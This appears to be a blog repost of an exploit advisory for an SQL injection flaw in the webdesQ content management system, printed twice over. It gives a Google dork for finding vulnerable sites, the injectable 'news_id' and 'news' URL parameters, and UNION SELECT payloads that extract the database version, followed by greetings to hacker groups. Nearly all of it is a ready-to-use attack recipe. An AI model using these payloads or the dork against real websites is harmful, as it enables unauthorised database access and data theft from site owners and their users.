| Filename | webdesQ sql injection vulnerability |
| Permission | rw-r--r-- |
| Author | Inveet.id |
| Date and Time | 23.49 |
| Label | Exploit |
| Action |
#Exploit Title: webdesQ sql injection vulnerability
#Date:02/07/2011
#Author:XaDaL
#Software Link: http://www.webdesq.nl/
#Tested on: windows xp
#google dork: inurl: “powered by webdesQ”
#########################################################
[-] EXPLOIT
http://[localhost]/index.php?id=26&news_id=[SQLI]
http://[localhost]/index.php?id=26&news=[SQLI]
[-]EXAMPLE
http://[localhost]/index.php?id=62&news_id=2127 union select
1,2,3,4,5,6,7–
http://[localhost]/index.php?id=24&news=166 union select
1,version(),3,4,5,6,7–
##########################################################
Thank’s to: xr0b0t
,kaMtiez,1bliez,jundab,boebefa,ulow,ryanaby,kampret0,hmei7
#virgi,hakz,dr.CruZz,geni212,red robot ,a17z,rj-45,anharku,jos_ali_joe
#arianom,tukulesto,cimpli,contrex,t3ll0,
#all members magelangcyber team,indonesiancoder and indonesian hacker
#Date:02/07/2011
#Author:XaDaL
#Software Link: http://www.webdesq.nl/
#Tested on: windows xp
#google dork: inurl: “powered by webdesQ”
#########################################################
[-] EXPLOIT
http://[localhost]/index.php?id=26&news_id=[SQLI]
http://[localhost]/index.php?id=26&news=[SQLI]
[-]EXAMPLE
http://[localhost]/index.php?id=62&news_id=2127 union select
1,2,3,4,5,6,7–
http://[localhost]/index.php?id=24&news=166 union select
1,version(),3,4,5,6,7–
##########################################################
Thank’s to: xr0b0t
,kaMtiez,1bliez,jundab,boebefa,ulow,ryanaby,kampret0,hmei7
#virgi,hakz,dr.CruZz,geni212,red robot ,a17z,rj-45,anharku,jos_ali_joe
#arianom,tukulesto,cimpli,contrex,t3ll0,
#all members magelangcyber team,indonesiancoder and indonesian hacker
0 komentar:
Posting Komentar